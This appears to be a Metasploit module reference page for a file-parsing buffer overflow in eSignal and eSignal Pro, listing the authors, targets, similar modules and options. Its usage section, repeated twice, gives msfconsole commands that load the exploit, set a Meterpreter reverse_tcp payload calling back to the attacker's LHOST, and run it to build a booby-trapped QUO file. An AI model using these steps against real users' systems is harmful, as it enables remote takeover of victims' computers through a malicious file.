eSignal and eSignal Pro <= 10.6.2425.1208 file parsing buffer overflow in QUO
The software is unable to handle the "<StyleTemplate>" files (even those original included in the program) like those with the registered extensions QUO, SUM and POR. Successful exploitation of this vulnerability may take up to several seconds due to the use of egghunter. Also, DEP bypass is unlikely due to the limited space for payload.
Exploit Rank
- Normal
Exploit Authors
- Luigi Auriemma < >
- TecR0c < tecr0c [at] tecninja.net >
- mr_me < steventhomasseeley [at] gmai.com >
Vulnerability References
Exploit Targets
- 0 - Win XP SP3 / Windows Vista / Windows 7 (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/fileformat/a-pdf_wav_to_mp3
- exploit/windows/fileformat/acdsee_fotoslate_string
- exploit/windows/fileformat/acdsee_xpm
- exploit/windows/fileformat/activepdf_webgrabber
- exploit/windows/fileformat/adobe_collectemailinfo
- exploit/windows/fileformat/adobe_cooltype_sing
- exploit/windows/fileformat/adobe_flashplayer_button
- exploit/windows/fileformat/adobe_flashplayer_newfunction
- exploit/windows/fileformat/adobe_flatedecode_predictor02
- exploit/windows/fileformat/adobe_geticon
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/esignal_styletemplate_bof
msf exploit(esignal_styletemplate_bof) > show payloads
msf exploit(esignal_styletemplate_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(esignal_styletemplate_bof) > set LHOST [MY IP ADDRESS]
msf exploit(esignal_styletemplate_bof) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/fileformat/esignal_styletemplate_bof
msf exploit(esignal_styletemplate_bof) > show payloads
msf exploit(esignal_styletemplate_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(esignal_styletemplate_bof) > set LHOST [MY IP ADDRESS]
msf exploit(esignal_styletemplate_bof) > exploit
Exploit Module Options
| FILENAME | The file name. (default: msf.quo) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |